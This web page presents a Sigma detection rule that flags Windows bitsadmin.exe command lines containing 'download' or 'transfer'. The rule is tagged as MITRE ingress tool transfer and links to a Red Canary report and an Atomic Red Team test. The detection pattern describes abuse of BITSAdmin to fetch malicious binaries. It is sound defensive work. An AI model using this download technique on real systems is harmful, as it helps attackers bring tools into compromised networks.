BITSAdmin Downloading Malicious Binaries

Nov 9, 2022 · attack.command_and_control attack.t1105 ·

Detects usage of BITSAdmin to download malicious code. Inspired by the 2022 Red Canary Threat Detection report.

Sigma rule (View on GitHub)

 1title: BITSAdmin Downloading Malicious Binaries
 2id: c7568c9e-f6c6-4cb7-a3c0-da356aef51d8
 3status: experimental
 4description: Detects usage of BITSAdmin to download malicious code. Inspired by the
 5  2022 Red Canary Threat Detection report.
 6references:
 7    - https://redcanary.com/threat-detection-report/techniques/ingress-tool-transfer/
 8    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md#atomic-test-9---windows---bitsadmin-bits-download
 9author: Micah Babinski
10date: 2022/11/03
11tags:
12    - attack.command_and_control
13    - attack.t1105
14logsource:
15    category: process_creation
16    product: windows
17detection:
18    selection:
19        Image|endswith: '\bitsadmin.exe'
20        CommandLine|contains:
21            - 'download'
22            - 'transfer'
23    condition: selection
24falsepositives:
25    - Unknown
26level: high```

References

Ingress Tool Transfer - Red Canary Threat Detection Report

Ingress Tool Transfer is a technique adversaries leverage to bring their own external tools into a compromised network.

Read More
atomic-red-team/atomics/T1105/T1105.md at master · redcanaryco/atomic-red-team

Small and highly portable detection tests based on MITRE's ATT&CK. - redcanaryco/atomic-red-team

Read More

BITSAdmin Downloading Malicious Binaries

Sigma rule (View on GitHub)

References

Ingress Tool Transfer - Red Canary Threat Detection Report

atomic-red-team/atomics/T1105/T1105.md at master · redcanaryco/atomic-red-team

Related rules